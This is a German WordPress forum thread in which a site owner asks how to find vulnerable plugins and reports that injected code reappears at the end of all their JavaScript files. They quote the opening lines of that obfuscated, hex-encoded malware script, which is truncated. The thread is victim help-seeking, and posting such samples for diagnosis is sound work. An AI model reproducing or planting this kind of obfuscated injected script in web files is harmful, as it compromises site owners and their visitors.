Website oder Thread mit Hack-Warnung?

  • Gibt es eine Website oder einen Thread, wo eine Liste von Plugins geführt wird, die verantwortlich für Hacks bzw. Sicherheitslücken sind?

    Oder wie findet man heraus, ob ein Plugin Sicherheitslücken hat?

    Ich habe nämlich das Problem, vermutlich gehackt worden zu sein. Da meine Passworte sehr lang und komplex sind (25 Zeichen, von Keepass generiert) und ich mir nicht vorstellen kann, dass ausgerechnet in meiner Site Wordpress-Lücken ausgenutzt werden, vermute ich die Ursache bei einem Plugin.

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Plugins nur aus offizieller Stelle laden und immer aktuell halten. Zusätzlich darauf achten, dass auch regelmäßig Updates kommen. Für das Theme gilt das gleich, sowie natürlich für Wordpress auch.

    Zusätzlich schauen ob dein PC sauber ist und sämtliche PCs, die Zugriff auf Wordpress bzw. FTP oder Datenbank haben.

    Das Geheimnis des Könnens liegt im Wollen!
    [size=12]Bitte keine Hilfegesuche per PN (auch keine "privaten" Links). Das ist ein öffentliches Forum.[/SIZE]

  • Es gibt auch Sites, die bekannte "Lücken" aufzeigen: https://wpvulndb.com/

    [size=10]Bitte immer zuerst die Forensuche nutzen und erst danach Deine Fragen hier im Forum stellen, denn sehr vieles wurde schon mehrfach beantwortet. Bitte dabei auch die Forenregeln beachten.
    Kein Support per PN - Fragen gehören ins Forum.[/SIZE]
    [size=8]Wenn du eine weise Antwort verlangst, musst du vernünftig fragen. (Johann Wolfgang von Goethe)[/SIZE]

  • Nein, sind nur Hinweise. Habe ich aber gern gemacht.

    Das Geheimnis des Könnens liegt im Wollen!
    [size=12]Bitte keine Hilfegesuche per PN (auch keine "privaten" Links). Das ist ein öffentliches Forum.[/SIZE]

  • davtedo Wie kommst du darauf, dass du eventuell gehackt wurdest?


    Weil ALLE *.js-Files am Dateiende Fremd-Code enthalten.
    Spiele ich ein Backup mit sauberen Files ein, sind nach wenigen Stunden alle *.js-Files wieder damit infiziert.

    So sehe die ersten paar Zeilen dieses Fremd-Codes aus (von etwa 20 mal so vielen):
    [FONT=courier new] /*304260db287a80b13ff0ed9fd9ed1b79*/;window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"]["\x69\x61\x73\x6e\x64"]=["\x32\x32\x62\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x62\x32\x32\x32\x37\x33\x65\x33\x63\x32\x66\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x33\x65\x33\x63\x32\x66\x36\x34\x36\x39\x37\x36\x33\x65\x32\x32\x33\x62\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x32\x36\x66\x36\x34\x37\x39\x32\x65\[/FONT]

    Einmal editiert, zuletzt von davtedo (10. Februar 2016 um 21:39)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!